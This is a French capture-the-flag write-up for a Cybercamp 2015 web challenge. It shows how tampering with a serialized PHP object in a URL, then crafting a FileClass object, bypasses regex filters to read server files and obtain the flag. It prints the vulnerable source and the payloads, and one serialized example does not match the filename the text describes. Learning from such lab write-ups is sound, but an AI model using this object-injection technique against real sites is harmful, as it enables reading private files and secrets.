Sur la page d’accueil, nous nous retrouvons devant un formulaire contenant plusieurs champs : name, age et un champ picture contenant une liste de fichiers d’images.<\/p>\n
Une fois ce formulaire valid\u00e9, on se retrouve avec un recapitulatif de ce que nous avons entr\u00e9 ainsi que notre image encod\u00e9e en base64 dans le tag <img>. Rien d’\u00e9trange jusqu’ici.
\nPar contre en regardant dans l’url de la page, nous retrouvons ce qui semble \u00eatre un objet serializ\u00e9 php.<\/p>\n
http:\/\/challenge.cybercamp.es:8092\/show.php?u="O:4:"User":3{s:3:"age";s:6:"sdvsdv";s:4:"name";s:6:"dsvsdv";s:7:"picture";s:8:"cat5.png";}"<\/pre>\nEt si on changeait ce cat5.png afin d’afficher autre chose qu’une image, par exemple le contenu de show.php ?<\/p>\n
\nBingo ! Nous retrouvons le code de la page en base64 dans la balise img !
\nUne fois d\u00e9cod\u00e9, il apparait un include.<\/p>\n
\r\n<?php include('UClass.php'); $obj = unserialize($_GET['u']); echo $obj; ?>\r\n<\/pre>\nNous utilisions alors la m\u00eame m\u00e9thode que pour r\u00e9cup\u00e9rer show.php mais cette fois-ci pour r\u00e9cup\u00e9rer UClass.php<\/p>\n
\r\n<?php include('config.php'); class FileClass { public $filename = 'error.log'; public function __toString() { return file_get_contents($this->filename);\r\n}\r\n}\r\n\r\nclass User\r\n{\r\npublic $age = 0;\r\npublic $name = '';\r\npublic $picture = 'null';\r\n\r\npublic function __toString()\r\n{\r\n$picture = $this->picture;\r\nif (preg_match("\/\\.\\.\/",$picture)) {\r\n$picture = "null";\r\n}\r\nif (preg_match("\/config\/",$picture)) {\r\n$picture = "null";\r\n}\r\nif (preg_match("\/\\\/\/",$picture)) {\r\n$picture = "null";\r\n}\r\n\r\nif (preg_match("\/^\\.\/",$picture)) {\r\n$picture = "null";\r\n}\r\nif (preg_match("\/:\/",$picture)) {\r\n$picture = "null";\r\n}\r\n\r\nreturn '<center>Your cat "' . $this->name . '" is ' . $this->age . ' years old. \r\n\r\n' .\r\n'<img height="200" width="200" src="data:image\/png;base64,' . base64_encode(file_get_contents($picture)) . '"><\/center> \r\n\r\n';\r\n\r\n}\r\n}\r\n?>\r\n<\/pre>\nNous voyons ici tout le code permettant \u00e0 la page de r\u00e9capitulatif de s’afficher, ainsi qu’un include de config.php.
\nLe souci maintenant c’est que il y a un preg_match() qui nous bloque la r\u00e9cup\u00e9ration de config.php de la m\u00eame m\u00eame mani\u00e8re avec laquelle nous avons proc\u00e9d\u00e9 pour les autres fichiers.
\nCependant il y a la classe FileClass qui s’occupe de faire un file_get_contents sans se soucier du fichier qu’elle va lire.
\nNous allons alors cr\u00e9er un objet FileClass ayant comme variable $filename \u00ab\u00a0config.php\u00a0\u00bb,<\/p>\n
\r\n<?php class FileClass { public $filename = 'error.log'; } $obj = new FileClass(); echo serialize($obj); \/\/ O:9:"FileClass":1:{s:8:"filename";s:9:"error.log";} ?>\r\n<\/pre>\nUne fois d\u00e9serializ\u00e9 cot\u00e9 serveur, la classe FileClass est instanci\u00e9e et ensuite le contenu de config.php est affich\u00e9 gr\u00e2ce au __toString(), ce qui nous donne le flag.<\/p>\n
\r\n<?php $you_are_cool="8df751c556681f8bd815a582351654fe"; ?>\r\n<\/pre>\n","protected":false},"excerpt":{"rendered":"Sur la page d’accueil, nous nous retrouvons devant un formulaire contenant plusieurs champs : name, age et un champ picture contenant une liste de fichiers d’images. Une fois ce formulaire valid\u00e9, on se retrouve avec un recapitulatif de ce que nous avons entr\u00e9 ainsi que notre image encod\u00e9e en base64 dans le tag <img>. Rien … Continuer la lecture de [Cybercamp 2015] [Web 12] Write Up<\/span>